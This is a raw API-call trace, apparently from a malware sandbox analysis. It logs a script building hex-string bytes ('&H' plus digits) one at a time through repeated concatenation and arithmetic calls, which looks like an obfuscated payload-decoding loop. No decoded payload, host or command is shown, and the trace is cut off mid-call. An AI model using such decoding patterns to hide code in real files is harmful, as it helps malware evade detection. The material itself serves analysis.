[0112.707] VarBstrCat (in: bstrLeft="&H0", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.707] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.708] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.708] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.708] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.708] VarBstrCat (in: bstrLeft="&He", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.708] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.708] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.708] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.708] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.708] VarBstrCat (in: bstrLeft="&H1", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.708] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.708] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.709] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.709] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.709] VarBstrCat (in: bstrLeft="&Ha", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.709] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.709] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.709] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.709] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.709] VarBstrCat (in: bstrLeft="&He", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.709] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.709] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.709] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.709] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.710] VarBstrCat (in: bstrLeft="&H2", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.710] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.710] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.710] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.710] VarBstrCat (in: bstrLeft="&H", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.710] VarBstrCat (in: bstrLeft="&H9", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.710] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.710] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.710] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.710] VarBstrCat (in: bstrLeft="&H", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.710] VarBstrCat (in: bstrLeft="&H9", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.711] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.711] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.711] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.711] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.711] VarBstrCat (in: bstrLeft="&H2", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.711] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.711] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.711] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.711] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.711] VarBstrCat (in: bstrLeft="&H1", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.711] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.712] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.712] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.712] VarBstrCat (in: bstrLeft="&H", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.712] VarBstrCat (in: bstrLeft="&H4", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.712] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.712] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.712] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.712] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.712] VarBstrCat (in: bstrLeft="&H0", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.712] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.712] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.713] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.713] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.713] VarBstrCat (in: bstrLeft="&Hc", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.713] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.713] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.713] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.713] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.713] VarBstrCat (in: bstrLeft="&Hc", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.713] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.713] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.713] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.713] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.714] VarBstrCat (in: bstrLeft="&Hf", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.714] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.714] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.714] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.714] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.714] VarBstrCat (in: bstrLeft="&H7", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.714] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.714] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.714] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.714] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.714] VarBstrCat (in: bstrLeft="&H0", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.714] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.715] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.715] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.715] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.715] VarBstrCat (in: bstrLeft="&H3", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.715] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.715] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.715] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.715] VarBstrCat (in: bstrLeft="&H", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.720] VarBstrCat (in: bstrLeft="&H5", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.720] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.721] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.721] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.721] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.721] VarBstrCat (in: bstrLeft="&Hc", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.721] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.721] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.721] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.721] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.721] VarBstrCat (in: bstrLeft="&H3", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.722] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.722] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.722] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.722] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.722] VarBstrCat (in: bstrLeft="&Hc", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.722] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.722] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.722] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.722] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.723] VarBstrCat (in: bstrLeft="&H0", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.723] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.723] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.723] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.723] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.723] VarBstrCat (in: bstrLeft="&H8", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.723] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.724] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.724] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.724] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.724] VarBstrCat (in: bstrLeft="&H8", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.724] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.724] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.724] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.724] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.724] VarBstrCat (in: bstrLeft="&Hb", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.724] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.725] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.725] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.725] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.725] VarBstrCat (in: bstrLeft="&H2", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.725] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.725] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.725] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.725] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.725] VarBstrCat (in: bstrLeft="&He", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.725] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.726] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.726] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.726] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.726] VarBstrCat (in: bstrLeft="&He", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.726] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.726] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.726] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.726] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.726] VarBstrCat (in: bstrLeft="&H0", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.727] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.727] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.727] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.727] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.727] VarBstrCat (in: bstrLeft="&H3", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.727] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.727] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.727] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.728] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.728] VarBstrCat (in: bstrLeft="&H3", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.728] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.728] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.728] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.728] VarBstrCat (in: bstrLeft="&H", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.728] VarBstrCat (in: bstrLeft="&H4", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.728] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.728] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.728] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.729] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.729] VarBstrCat (in: bstrLeft="&H6", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.729] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.729] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.729] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.729] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.729] VarBstrCat (in: bstrLeft="&H0", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.729] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.729] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.730] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.730] VarBstrCat (in: bstrLeft="&H", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.730] VarBstrCat (in: bstrLeft="&H9", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.730] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.730] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.730] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.730] VarBstrCat (in: bstrLeft="&H", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.730] VarBstrCat (in: bstrLeft="&H4", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.730] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.731] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.731] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.731] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.731] VarBstrCat (in: bstrLeft="&H6", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.731] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.731] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.731] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.731] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.731] VarBstrCat (in: bstrLeft="&H1", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.731] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.732] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.732] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.732] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.732] VarBstrCat (in: bstrLeft="&Hc", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.732] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.732] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.732] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.732] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.732] VarBstrCat (in: bstrLeft="&H3", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.732] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.733] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.733] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.733] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.733] VarBstrCat (in: bstrLeft="&H0", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.733] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, 